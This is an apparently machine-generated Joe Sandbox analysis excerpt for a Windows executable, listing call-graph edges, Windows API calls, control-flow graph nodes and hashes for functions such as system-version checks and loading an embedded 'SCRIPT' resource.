100017 bdd20f 100013->100017 100014->100017 100019 bd4bfb 100014->100019 100015 bc0a8c CatchGuardHandler 5 API calls 100016 bbfed8 100015->100016 100016->99935 100016->99970 100017->100015 100020 bd4c07 CallCatchBlock 100019->100020 100031 bd2f5e EnterCriticalSection 100020->100031 100022 bd4c0e 100032 bd50af 100022->100032 100024 bd4c1d 100030 bd4c2c 100024->100030 100045 bd4a8f 29 API calls 100024->100045 100027 bd4c27 100046 bd4b45 GetStdHandle GetFileType 100027->100046 100029 bd4c3d __fread_nolock 100029->100014 100047 bd4c48 LeaveCriticalSection _abort 100030->100047 100031->100022 100033 bd50bb CallCatchBlock 100032->100033 100034 bd50df 100033->100034 100035 bd50c8 100033->100035 100048 bd2f5e EnterCriticalSection 100034->100048 100056 bcf2d9 20 API calls __dosmaperr 100035->100056 100038 bd50cd 100057 bd27ec 26 API calls _strftime 100038->100057 100040 bd50d7 __fread_nolock 100040->100024 100043 bd50eb 100044 bd5117 100043->100044 100049 bd5000 100043->100049 100058 bd513e LeaveCriticalSection _abort 100044->100058 100045->100027 100046->100030 100047->100029 100048->100043 100050 bd4c7d pre_c_initialization 20 API calls 100049->100050 100052 bd5012 100050->100052 100051 bd501f 100053 bd29c8 _free 20 API calls 100051->100053 100052->100051 100059 bd3405 11 API calls 2 library calls 100052->100059 100055 bd5071 100053->100055 100055->100043 100056->100038 100057->100040 100058->100040 100059->100052 100060->99948 100061 ba1033 100066 ba4c91 100061->100066 100065 ba1042 100067 baa961 22 API calls 100066->100067 100068 ba4cff 100067->100068 100074 ba3af0 100068->100074 100071 ba4d9c 100072 ba1038 100071->100072 100077 ba51f7 22 API calls __fread_nolock 100071->100077 100073 bc00a3 29 API calls __onexit 100072->100073 100073->100065 100078 ba3b1c 100074->100078 100077->100071 100079 ba3b29 100078->100079 100081 ba3b0f 100078->100081 100080 ba3b30 RegOpenKeyExW 100079->100080 100079->100081 100080->100081 100082 ba3b4a RegQueryValueExW 100080->100082 100081->100071 100083 ba3b6b 100082->100083 100084 ba3b80 RegCloseKey 100082->100084 100083->100084 100084->100081 100085 ba3156 100088 ba3170 100085->100088 100089 ba3187 100088->100089 100090 ba31eb 100089->100090 100091 ba318c 100089->100091 100092 ba31e9 100089->100092 100093 be2dfb 100090->100093 100094 ba31f1 100090->100094 100095 ba3199 100091->100095 100096 ba3265 PostQuitMessage 100091->100096 100097 ba31d0 DefWindowProcW 100092->100097 100137 ba18e2 10 API calls 100093->100137 100098 ba31f8 100094->100098 100099 ba321d SetTimer RegisterWindowMessageW 100094->100099 100101 be2e7c 100095->100101 100102 ba31a4 100095->100102 100103 ba316a 100096->100103 100097->100103 100104 be2d9c 100098->100104 100105 ba3201 KillTimer 100098->100105 100099->100103 100107 ba3246 CreatePopupMenu 100099->100107 100143 c0bf30 34 API calls ___scrt_fastfail 100101->100143 100108 ba31ae 100102->100108 100109 be2e68 100102->100109 100117 be2dd7 MoveWindow 100104->100117 100118 be2da1 100104->100118 100133 ba30f2 Shell_NotifyIconW ___scrt_fastfail 100105->100133 100106 be2e1c 100138 bbe499 42 API calls 100106->100138 100107->100103 100114 be2e4d 100108->100114 100115 ba31b9 100108->100115 100142 c0c161 27 API calls ___scrt_fastfail 100109->100142 100114->100097 100141 c00ad7 22 API calls 100114->100141 100121 ba31c4 100115->100121 100122 ba3253 100115->100122 100116 be2e8e 100116->100097 100116->100103 100117->100103 100123 be2dc6 SetFocus 100118->100123 100124 be2da7 100118->100124 100119 ba3214 100134 ba3c50 DeleteObject DestroyWindow 100119->100134 100120 ba3263 100120->100103 100121->100097 100139 ba30f2 Shell_NotifyIconW ___scrt_fastfail 100121->100139 100135 ba326f 44 API calls ___scrt_fastfail 100122->100135 100123->100103 100124->100121 100125 be2db0 100124->100125 100136 ba18e2 10 API calls 100125->100136 100131 be2e41 100140 ba3837 49 API calls ___scrt_fastfail 100131->100140 100133->100119 100134->100103 100135->100120 100136->100103 100137->100106 100138->100121 100139->100131 100140->100092 100141->100092 100142->100120 100143->100116 100144 ba2e37 100145 baa961 22 API calls 100144->100145 100146 ba2e4d 100145->100146 100223 ba4ae3 100146->100223 100148 ba2e6b 100149 ba3a5a 24 API calls 100148->100149 100150 ba2e7f 100149->100150 100151 ba9cb3 22 API calls 100150->100151 100152 ba2e8c 100151->100152 100153 ba4ecb 94 API calls 100152->100153 100154 ba2ea5 100153->100154 100155 ba2ead 100154->100155 100156 be2cb0 100154->100156 100159 baa8c7 22 API calls 100155->100159 100253 c12cf9 100156->100253 100158 be2cc3 100160 be2ccf 100158->100160 100162 ba4f39 68 API calls 100158->100162 100161 ba2ec3 100159->100161 100164 ba4f39 68 API calls 100160->100164 100237 ba6f88 22 API calls 100161->100237 100162->100160 100166 be2ce5 100164->100166 100165 ba2ecf 100167 ba9cb3 22 API calls 100165->100167 100279 ba3084 22 API calls 100166->100279 100168 ba2edc 100167->100168 100238 baa81b 41 API calls 100168->100238 100171 ba2eec 100173 ba9cb3 22 API calls 100171->100173 100172 be2d02 100280 ba3084 22 API calls 100172->100280 100175 ba2f12 100173->100175 100239 baa81b 41 API calls 100175->100239 100176 be2d1e 100178 ba3a5a 24 API calls 100176->100178 100180 be2d44 100178->100180 100179 ba2f21 100183 baa961 22 API calls 100179->100183 100281 ba3084 22 API calls 100180->100281 100182 be2d50 100184 baa8c7 22 API calls 100182->100184 100185 ba2f3f 100183->100185 100186 be2d5e 100184->100186 100240 ba3084 22 API calls 100185->100240 100282 ba3084 22 API calls 100186->100282 100189 ba2f4b 100241 bc4a28 40 API calls 2 library calls 100189->100241 100190 be2d6d 100194 baa8c7 22 API calls 100190->100194 100192 ba2f59 100192->100166 100193 ba2f63 100192->100193 100242 bc4a28 40 API calls 2 library calls 100193->100242 100196 be2d83 100194->100196 100283 ba3084 22 API calls 100196->100283 100197 ba2f6e 100197->100172 100199 ba2f78 100197->100199 100243 bc4a28 40 API calls 2 library calls 100199->100243 100200 be2d90 100202 ba2f83 100202->100176 100203 ba2f8d 100202->100203 100244 bc4a28 40 API calls 2 library calls 100203->100244 100205 ba2f98 100206 ba2fdc 100205->100206 100245 ba3084 22 API calls 100205->100245 100206->100190 100207 ba2fe8 100206->100207 100207->100200 100247 ba63eb 22 API calls 100207->100247 100209 ba2fbf 100212 baa8c7 22 API calls 100209->100212 100211 ba2ff8 100248 ba6a50 22 API calls 100211->100248 100214 ba2fcd 100212->100214 100246 ba3084 22 API calls 100214->100246 100215 ba3006 100249 ba70b0 23 API calls 100215->100249 100220 ba3021 100221 ba3065 100220->100221 100250 ba6f88 22 API calls 100220->100250 100251 ba70b0 23 API calls 100220->100251 100252 ba3084 22 API calls 100220->100252 100224 ba4af0 __wsopen_s 100223->100224 100225 ba6b57 22 API calls 100224->100225 100226 ba4b22 100224->100226 100225->100226 100227 ba4c6d 22 API calls 100226->100227 100236 ba4b58 100226->100236 100227->100226 100228 ba4c6d 22 API calls 100228->100236 100229 ba9cb3 22 API calls 100231 ba4c52 100229->100231 100230 ba9cb3 22 API calls 100230->100236 100232 ba515f 22 API calls 100231->100232 100234 ba4c5e 100232->100234 100233 ba515f 22 API calls 100233->100236 100234->100148 100235 ba4c29 100235->100229 100235->100234 100236->100228 100236->100230 100236->100233 100236->100235 100237->100165 100238->100171 100239->100179 100240->100189 100241->100192 100242->100197 100243->100202 100244->100205 100245->100209 100246->100206 100247->100211 100248->100215 100249->100220 100250->100220 100251->100220 100252->100220 100254 c12d15 100253->100254 100255 ba511f 64 API calls 100254->100255 100256 c12d29 100255->100256 100257 c12e66 75 API calls 100256->100257 100258 c12d3b 100257->100258 100259 ba50f5 40 API calls 100258->100259 100276 c12d3f 100258->100276 100260 c12d56 100259->100260 100261 ba50f5 40 API calls 100260->100261 100262 c12d66 100261->100262 100263 ba50f5 40 API calls 100262->100263 100264 c12d81 100263->100264 100265 ba50f5 40 API calls 100264->100265 100266 c12d9c 100265->100266 100267 ba511f 64 API calls 100266->100267 100268 c12db3 100267->100268 100269 bcea0c ___std_exception_copy 21 API calls 100268->100269 100270 c12dba 100269->100270 100271 bcea0c ___std_exception_copy 21 API calls 100270->100271 100272 c12dc4 100271->100272 100273 ba50f5 40 API calls 100272->100273 100274 c12dd8 100273->100274 100275 c128fe 27 API calls 100274->100275 100277 c12dee 100275->100277 100276->100158 100277->100276 100278 c122ce 79 API calls 100277->100278 100278->100276 100279->100172 100280->100176 100281->100182 100282->100190 100283->100200 100284 bc03e9 100289 bc09d5 SetUnhandledExceptionFilter 100284->100289 100286 bc03ee pre_c_initialization 100290 bc4fa9 26 API calls 2 library calls 100286->100290 100288 bc03f9 100289->100286 100290->100288 100291 ba1cad SystemParametersInfoW 100292 ba2de3 100293 ba2df0 __wsopen_s 100292->100293 100294 ba2e09 100293->100294 100295 be2c2b ___scrt_fastfail 100293->100295 100296 ba3aa2 23 API calls 100294->100296 100297 be2c47 GetOpenFileNameW 100295->100297 100298 ba2e12 100296->100298 100299 be2c96 100297->100299 100308 ba2da5 100298->100308 100301 ba6b57 22 API calls 100299->100301 100303 be2cab 100301->100303 100303->100303 100305 ba2e27 100326 ba44a8 100305->100326 100309 be1f50 __wsopen_s 100308->100309 100310 ba2db2 GetLongPathNameW 100309->100310 100311 ba6b57 22 API calls 100310->100311 100312 ba2dda 100311->100312 100313 ba3598 100312->100313 100314 baa961 22 API calls 100313->100314 100315 ba35aa 100314->100315 100316 ba3aa2 23 API calls 100315->100316 100317 ba35b5 100316->100317 100318 ba35c0 100317->100318 100322 be32eb 100317->100322 100320 ba515f 22 API calls 100318->100320 100321 ba35cc 100320->100321 100355 ba35f3 100321->100355 100323 be330d 100322->100323 100361 bbce60 41 API calls 100322->100361 100325 ba35df 100325->100305 100327 ba4ecb 94 API calls 100326->100327 100328 ba44cd 100327->100328 100329 be3833 100328->100329 100330 ba4ecb 94 API calls 100328->100330 100331 c12cf9 80 API calls 100329->100331 100332 ba44e1 100330->100332 100333 be3848 100331->100333 100332->100329 100334 ba44e9 100332->100334 100335 be384c 100333->100335 100336 be3869 100333->100336 100338 be3854 100334->100338 100339 ba44f5 100334->100339 100340 ba4f39 68 API calls 100335->100340 100337 bbfe0b 22 API calls 100336->100337 100354 be38ae 100337->100354 100363 c0da5a 82 API calls 100338->100363 100362 ba940c 136 API calls 2 library calls 100339->100362 100340->100338 100343 ba2e31 100344 be3862 100344->100336 100345 ba4f39 68 API calls 100348 be3a5f 100345->100348 100348->100345 100369 c0989b 82 API calls __wsopen_s 100348->100369 100351 ba9cb3 22 API calls 100351->100354 100354->100348 100354->100351 100364 c0967e 22 API calls __fread_nolock 100354->100364 100365 c095ad 42 API calls _wcslen 100354->100365 100366 c10b5a 22 API calls 100354->100366 100367 baa4a1 22 API calls __fread_nolock 100354->100367 100368 ba3ff7 22 API calls 100354->100368 100356 ba3605 100355->100356 100360 ba3624 __fread_nolock 100355->100360 100358 bbfe0b 22 API calls 100356->100358 100357 bbfddb 22 API calls 100359 ba363b 100357->100359 100358->100360 100359->100325 100360->100357 100361->100322 100362->100343 100363->100344 100364->100354 100365->100354 100366->100354 100367->100354 100368->100354 100369->100348 100370 be2ba5 100371 be2baf 100370->100371 100372 ba2b25 100370->100372 100374 ba3a5a 24 API calls 100371->100374 100398 ba2b83 7 API calls 100372->100398 100376 be2bb8 100374->100376 100378 ba9cb3 22 API calls 100376->100378 100379 be2bc6 100378->100379 100381 be2bce 100379->100381 100382 be2bf5 100379->100382 100380 ba2b2f 100383 ba2b44 100380->100383 100402 ba3837 49 API calls ___scrt_fastfail 100380->100402 100385 ba33c6 22 API calls 100381->100385 100386 ba33c6 22 API calls 100382->100386 100390 ba2b5f 100383->100390 100403 ba30f2 Shell_NotifyIconW ___scrt_fastfail 100383->100403 100387 be2bd9 100385->100387 100388 be2bf1 GetForegroundWindow ShellExecuteW 100386->100388 100389 ba6350 22 API calls 100387->100389 100394 be2c26 100388->100394 100392 be2be7 100389->100392 100396 ba2b66 SetCurrentDirectoryW 100390->100396 100395 ba33c6 22 API calls 100392->100395 100394->100390 100395->100388 100397 ba2b7a 100396->100397 100404 ba2cd4 7 API calls 100398->100404 100400 ba2b2a 100401 ba2c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 100400->100401 100401->100380 100402->100383 100403->100390 100404->100400 100405 ba1044 100410 ba10f3 100405->100410 100407 ba104a 100446 bc00a3 29 API calls __onexit 100407->100446 100409 ba1054 100447 ba1398 100410->100447 100414 ba116a 100415 baa961 22 API calls 100414->100415 100416 ba1174 100415->100416 100417 baa961 22 API calls 100416->100417 100418 ba117e 100417->100418 100419 baa961 22 API calls 100418->100419 100420 ba1188 100419->100420 100421 baa961 22 API calls 100420->100421 100422 ba11c6 100421->100422 100423 baa961 22 API calls 100422->100423 100424 ba1292 100423->100424 100457 ba171c 100424->100457 100428 ba12c4 100429 baa961 22 API calls 100428->100429 100430 ba12ce 100429->100430 100431 bb1940 9 API calls 100430->100431 100432 ba12f9 100431->100432 100478 ba1aab 100432->100478 100434 ba1315 100435 ba1325 GetStdHandle 100434->100435 100436 be2485 100435->100436 100438 ba137a 100435->100438 100437 be248e 100436->100437 100436->100438 100439 bbfddb 22 API calls 100437->100439 100440 ba1387 OleInitialize 100438->100440 100441 be2495 100439->100441 100440->100407 100485 c1011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 100441->100485 100443 be249e 100486 c10944 CreateThread 100443->100486 100445 be24aa CloseHandle 100445->100438 100446->100409 100487 ba13f1 100447->100487 100450 ba13f1 22 API calls 100451 ba13d0 100450->100451 100452 baa961 22 API calls 100451->100452 100453 ba13dc 100452->100453 100454 ba6b57 22 API calls 100453->100454 100455 ba1129 100454->100455 100456 ba1bc3 6 API calls 100455->100456 100456->100414 100458 baa961 22 API calls 100457->100458 100459 ba172c 100458->100459 100460 baa961 22 API calls 100459->100460 100461 ba1734 100460->100461 100462 baa961 22 API calls 100461->100462 100463 ba174f 100462->100463 100464 bbfddb 22 API calls 100463->100464 100465 ba129c 100464->100465 100466 ba1b4a 100465->100466 100467 ba1b58 100466->100467 100468 baa961 22 API calls 100467->100468 100469 ba1b63 100468->100469 100470 baa961 22 API calls 100469->100470 100471 ba1b6e 100470->100471 100472 baa961 22 API calls 100471->100472 100473 ba1b79 100472->100473 100474 baa961 22 API calls 100473->100474 100475 ba1b84 100474->100475 100476 bbfddb 22 API calls 100475->100476 100477 ba1b96 RegisterWindowMessageW 100476->100477 100477->100428 100479 ba1abb 100478->100479 100480 be272d 100478->100480 100481 bbfddb 22 API calls 100479->100481 100494 c13209 23 API calls 100480->100494 100483 ba1ac3 100481->100483 100483->100434 100484 be2738 100485->100443 100486->100445 100495 c1092a 28 API calls 100486->100495 100488 baa961 22 API calls 100487->100488 100489 ba13fc 100488->100489 100490 baa961 22 API calls 100489->100490 100491 ba1404 100490->100491 100492 baa961 22 API calls 100491->100492 100493 ba13c6 100492->100493 100493->100450 100494->100484 100496 badee5 100499 bab710 100496->100499 100500 bab72b 100499->100500 100501 bf00f8 100500->100501 100502 bf0146 100500->100502 100521 bab750 100500->100521 100505 bf0102 100501->100505 100508 bf010f 100501->100508 100501->100521 100541 c258a2 256 API calls 2 library calls 100502->100541 100539 c25d33 256 API calls 100505->100539 100520 baba20 100508->100520 100540 c261d0 256 API calls 2 library calls 100508->100540 100511 bbd336 40 API calls 100511->100521 100512 bf03d9 100512->100512 100516 baba4e 100517 bf0322 100544 c25c0c 82 API calls 100517->100544 100520->100516 100545 c1359c 82 API calls __wsopen_s 100520->100545 100521->100511 100521->100516 100521->100517 100521->100520 100526 babbe0 40 API calls 100521->100526 100527 baec40 256 API calls 100521->100527 100528 baa8c7 22 API calls 100521->100528 100530 baa81b 41 API calls 100521->100530 100531 bbd2f0 40 API calls 100521->100531 100532 bba01b 256 API calls 100521->100532 100533 bc0242 5 API calls __Init_thread_wait 100521->100533 100534 bbedcd 22 API calls 100521->100534 100535 bc00a3 29 API calls __onexit 100521->100535 100536 bc01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 100521->100536 100537 bbee53 82 API calls 100521->100537 100538 bbe5ca 256 API calls 100521->100538 100542 baaceb 23 API calls ISource 100521->100542 100543 bff6bf 23 API calls 100521->100543 100526->100521 100527->100521 100528->100521 100530->100521 100531->100521 100532->100521 100533->100521 100534->100521 100535->100521 100536->100521 100537->100521 100538->100521 100539->100508 100540->100520 100541->100521 100542->100521 100543->100521 100544->100520 100545->100512 100546 bf2a00 100557 bad7b0 ISource 100546->100557 100547 bad9d5 100548 badb11 PeekMessageW 100548->100557 100549 bad807 GetInputState 100549->100548 100549->100557 100551 bf1cbe TranslateAcceleratorW 100551->100557 100552 bada04 timeGetTime 100552->100557 100553 badb8f PeekMessageW 100553->100557 100554 badb73 TranslateMessage DispatchMessageW 100554->100553 100555 badbaf Sleep 100558 badbc0 100555->100558 100556 bf2b74 Sleep 100556->100558 100557->100547 100557->100548 100557->100549 100557->100551 100557->100552 100557->100553 100557->100554 100557->100555 100557->100556 100560 bf1dda timeGetTime 100557->100560 100574 baec40 256 API calls 100557->100574 100575 bb1310 256 API calls 100557->100575 100578 badd50 100557->100578 100585 badfd0 100557->100585 100608 babf40 256 API calls 2 library calls 100557->100608 100609 bbedf6 IsDialogMessageW GetClassLongW 100557->100609 100611 c13a2a 23 API calls 100557->100611 100612 c1359c 82 API calls __wsopen_s 100557->100612 100558->100547 100558->100557 100559 bbe551 timeGetTime 100558->100559 100563 bf2c0b GetExitCodeProcess 100558->100563 100567 bf2a31 100558->100567 100568 c329bf GetForegroundWindow 100558->100568 100569 bf2ca9 Sleep 100558->100569 100613 c25658 23 API calls 100558->100613 100614 c0e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 100558->100614 100615 c0d4dc 47 API calls 100558->100615 100559->100558 100610 bbe300 23 API calls 100560->100610 100565 bf2c37 CloseHandle 100563->100565 100566 bf2c21 WaitForSingleObject 100563->100566 100565->100558 100566->100557 100566->100565 100567->100547 100568->100558 100569->100557 100574->100557 100575->100557 100579 badd6f 100578->100579 100580 badd83 100578->100580 100616 bad260 256 API calls 2 library calls 100579->100616 100617 c1359c 82 API calls __wsopen_s 100580->100617 100582 badd7a 100582->100557 100584 bf2f75 100584->100584 100586 bae010 100585->100586 100603 bae0dc ISource 100586->100603 100620 bc0242 5 API calls __Init_thread_wait 100586->100620 100589 bf2fca 100591 baa961 22 API calls 100589->100591 100589->100603 100590 baa961 22 API calls 100590->100603 100593 bf2fe4 100591->100593 100592 c1359c 82 API calls 100592->100603 100621 bc00a3 29 API calls __onexit 100593->100621 100597 bf2fee 100622 bc01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 100597->100622 100600 baec40 256 API calls 100600->100603 100602 baa8c7 22 API calls 100602->100603 100603->100590 100603->100592 100603->100600 100603->100602 100604 bae3e1 100603->100604 100605 bb04f0 22 API calls 100603->100605 100618 baa81b 41 API calls 100603->100618 100619 bba308 256 API calls 100603->100619 100623 bc0242 5 API calls __Init_thread_wait 100603->100623 100624 bc00a3 29 API calls __onexit 100603->100624 100625 bc01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 100603->100625 100626 c247d4 256 API calls 100603->100626 100627 c268c1 256 API calls 100603->100627 100604->100557 100605->100603 100608->100557 100609->100557 100610->100557 100611->100557 100612->100557 100613->100558 100614->100558 100615->100558 100616->100582 100617->100584 100618->100603 100619->100603 100620->100589 100621->100597 100622->100603 100623->100603 100624->100603 100625->100603 100626->100603 100627->100603 100628 bd8402 100633 bd81be 100628->100633 100632 bd842a 100638 bd81ef try_get_first_available_module 100633->100638 100635 bd83ee 100652 bd27ec 26 API calls _strftime 100635->100652 100637 bd8343 100637->100632 100645 be0984 100637->100645 100638->100638 100641 bd8338 100638->100641 100648 bc8e0b 40 API calls 2 library calls 100638->100648 100640 bd838c 100640->100641 100649 bc8e0b 40 API calls 2 library calls 100640->100649 100641->100637 100651 bcf2d9 20 API calls __dosmaperr 100641->100651 100643 bd83ab 100643->100641 100650 bc8e0b 40 API calls 2 library calls 100643->100650 100653 be0081 100645->100653 100647 be099f 100647->100632 100648->100640 100649->100643 100650->100641 100651->100635 100652->100637 100654 be008d CallCatchBlock 100653->100654 100655 be009b 100654->100655 100657 be00d4 100654->100657 100711 bcf2d9 20 API calls __dosmaperr 100655->100711 100664 be065b 100657->100664 100658 be00a0 100712 bd27ec 26 API calls _strftime 100658->100712 100663 be00aa __fread_nolock 100663->100647 100714 be042f 100664->100714 100667 be068d 100746 bcf2c6 20 API calls __dosmaperr 100667->100746 100668 be06a6 100732 bd5221 100668->100732 100671 be06ab 100672 be06cb 100671->100672 100673 be06b4 100671->100673 100745 be039a CreateFileW 100672->100745 100748 bcf2c6 20 API calls __dosmaperr 100673->100748 100677 be06b9 100749 bcf2d9 20 API calls __dosmaperr 100677->100749 100678 be0704 100679 be0781 GetFileType 100678->100679 100682 be0756 GetLastError 100678->100682 100750 be039a CreateFileW 100678->100750 100683 be078c GetLastError 100679->100683 100684 be07d3 100679->100684 100680 be00f8 100713 be0121 LeaveCriticalSection __wsopen_s 100680->100713 100751 bcf2a3 20 API calls 2 library calls 100682->100751 100752 bcf2a3 20 API calls 2 library calls 100683->100752 100754 bd516a 21 API calls 3 library calls 100684->100754 100685 be0692 100747 bcf2d9 20 API calls __dosmaperr 100685->100747 100689 be079a CloseHandle 100689->100685 100692 be07c3 100689->100692 100691 be0749 100691->100679 100691->100682 100753 bcf2d9 20 API calls __dosmaperr 100692->100753 100693 be07f4 100695 be0840 100693->100695 100755 be05ab 72 API calls 4 library calls 100693->100755 100700 be086d 100695->100700 100756 be014d 72 API calls 4 library calls 100695->100756 100696 be07c8 100696->100685 100699 be0866 100699->100700 100701 be087e 100699->100701 100702 bd86ae __wsopen_s 29 API calls 100700->100702 100701->100680 100703 be08fc CloseHandle 100701->100703 100702->100680 100757 be039a CreateFileW 100703->100757 100705 be0927 100706 be095d 100705->100706 100707 be0931 GetLastError 100705->100707 100706->100680 100758 bcf2a3 20 API calls 2 library calls 100707->100758 100709 be093d 100759 bd5333 21 API calls 3 library calls 100709->100759 100711->100658 100712->100663 100713->100663 100715 be046a 100714->100715 100716 be0450 100714->100716 100760 be03bf 100715->100760 100716->100715 100767 bcf2d9 20 API calls __dosmaperr 100716->100767 100719 be04a2 100722 be04d1 100719->100722 100769 bcf2d9 20 API calls __dosmaperr 100719->100769 100720 be045f 100768 bd27ec 26 API calls _strftime 100720->100768 100730 be0524 100722->100730 100771 bcd70d 26 API calls 2 library calls 100722->100771 100725 be051f 100727 be059e 100725->100727 100725->100730 100726 be04c6 100770 bd27ec 26 API calls _strftime 100726->100770 100772 bd27fc 11 API calls _abort 100727->100772 100730->100667 100730->100668 100731 be05aa 100733 bd522d CallCatchBlock 100732->100733 100775 bd2f5e EnterCriticalSection 100733->100775 100735 bd5234 100737 bd5259 100735->100737 100741 bd52c7 EnterCriticalSection 100735->100741 100742 bd527b 100735->100742 100739 bd5000 __wsopen_s 21 API calls 100737->100739 100738 bd52a4 __fread_nolock 100738->100671 100740 bd525e 100739->100740 100740->100742 100779 bd5147 EnterCriticalSection 100740->100779 100741->100742 100743 bd52d4 LeaveCriticalSection 100741->100743 100776 bd532a 100742->100776 100743->100735 100745->100678 100746->100685 100747->100680 100748->100677 100749->100685 100750->100691 100751->100685 100752->100689 100753->100696 100754->100693 100755->100695 100756->100699 100757->100705 100758->100709 100759->100706 100762 be03d7 100760->100762 100761 be03f2 100761->100719 100762->100761 100773 bcf2d9 20 API calls __dosmaperr 100762->100773 100764 be0416 100774 bd27ec 26 API calls _strftime 100764->100774 100766 be0421 100766->100719 100767->100720 100768->100715 100769->100726 100770->100722 100771->100725 100772->100731 100773->100764 100774->100766 100775->100735 100780 bd2fa6 LeaveCriticalSection 100776->100780 100778 bd5331 100778->100738 100779->100742 100780->100778

                                                                      Executed Functions

                                                                      Function 00BA42DE Relevance: 23.0, APIs: 9, Strings: 4, Instructions: 235libraryloaderCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 ba42de-ba434d call baa961 GetVersionExW call ba6b57 5 be3617-be362a 0->5 6 ba4353 0->6 8 be362b-be362f 5->8 7 ba4355-ba4357 6->7 9 ba435d-ba43bc call ba93b2 call ba37a0 7->9 10 be3656 7->10 11 be3632-be363e 8->11 12 be3631 8->12 29 be37df-be37e6 9->29 30 ba43c2-ba43c4 9->30 16 be365d-be3660 10->16 11->8 13 be3640-be3642 11->13 12->11 13->7 15 be3648-be364f 13->15 15->5 18 be3651 15->18 19 ba441b-ba4435 GetCurrentProcess IsWow64Process 16->19 20 be3666-be36a8 16->20 18->10 22 ba4437 19->22 23 ba4494-ba449a 19->23 20->19 24 be36ae-be36b1 20->24 26 ba443d-ba4449 22->26 23->26 27 be36db-be36e5 24->27 28 be36b3-be36bd 24->28 31 ba444f-ba445e LoadLibraryA 26->31 32 be3824-be3828 GetSystemInfo 26->32 36 be36f8-be3702 27->36 37 be36e7-be36f3 27->37 33 be36bf-be36c5 28->33 34 be36ca-be36d6 28->34 38 be37e8 29->38 39 be3806-be3809 29->39 30->16 35 ba43ca-ba43dd 30->35 44 ba449c-ba44a6 GetSystemInfo 31->44 45 ba4460-ba446e GetProcAddress 31->45 33->19 34->19 46 be3726-be372f 35->46 47 ba43e3-ba43e5 35->47 40 be3704-be3710 36->40 41 be3715-be3721 36->41 37->19 48 be37ee 38->48 42 be380b-be381a 39->42 43 be37f4-be37fc 39->43 40->19 41->19 42->48 51 be381c-be3822 42->51 43->39 53 ba4476-ba4478 44->53 45->44 52 ba4470-ba4474 GetNativeSystemInfo 45->52 49 be373c-be3748 46->49 50 be3731-be3737 46->50 54 ba43eb-ba43ee 47->54 55 be374d-be3762 47->55 48->43 49->19 50->19 51->43 52->53 60 ba447a-ba447b FreeLibrary 53->60 61 ba4481-ba4493 53->61 56 ba43f4-ba440f 54->56 57 be3791-be3794 54->57 58 be376f-be377b 55->58 59 be3764-be376a 55->59 62 be3780-be378c 56->62 63 ba4415 56->63 57->19 64 be379a-be37c1 57->64 58->19 59->19 60->61 62->19 63->19 65 be37ce-be37da 64->65 66 be37c3-be37c9 64->66 65->19 66->19
                                                                      APIs
                                                                      • GetVersionExW.KERNEL32(?), ref: 00BA430D
                                                                        • Part of subcall function 00BA6B57: _wcslen.LIBCMT ref: 00BA6B6A
                                                                      • GetCurrentProcess.KERNEL32(?,00C3CB64,00000000,?,?), ref: 00BA4422
                                                                      • IsWow64Process.KERNEL32(00000000,?,?), ref: 00BA4429
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00BA4454
                                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo,?,?), ref: 00BA4466
                                                                      • GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00BA4474
                                                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 00BA447B
                                                                      • GetSystemInfo.KERNEL32(?,?,?), ref: 00BA44A0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                      • String ID: GetNativeSystemInfo$kernel32.dll$|O$=
                                                                      • API String ID: 3290436268-487716248
                                                                      • Opcode ID: 645464ad87388bf772f681e67cad357595e00f5eb0fdddfb93dd3d8095b5c009
                                                                      • Instruction ID: 5a827c6c20eeb1e3bf1b46455a2c64685be6b4cee80763da5124aa17cc3f121c
                                                                      • Opcode Fuzzy Hash: 645464ad87388bf772f681e67cad357595e00f5eb0fdddfb93dd3d8095b5c009
                                                                      • Instruction Fuzzy Hash: 33A1AF7691E2C0CFCB11CB6D688679D7EE4AB67700B0C48D9E88D97B72D7604A84CB21
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BA42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 660 ba42a2-ba42ba CreateStreamOnHGlobal 661 ba42da-ba42dd 660->661 662 ba42bc-ba42d3 FindResourceExW 660->662 663 ba42d9 662->663 664 be35ba-be35c9 LoadResource 662->664 663->661 664->663 665 be35cf-be35dd SizeofResource 664->665 665->663 666 be35e3-be35ee LockResource 665->666 666->663 667 be35f4-be3612 666->667 667->663
                                                                      APIs
                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00BA42B2
                                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00BA50AA,?,?,00000000,00000000), ref: 00BA42C9
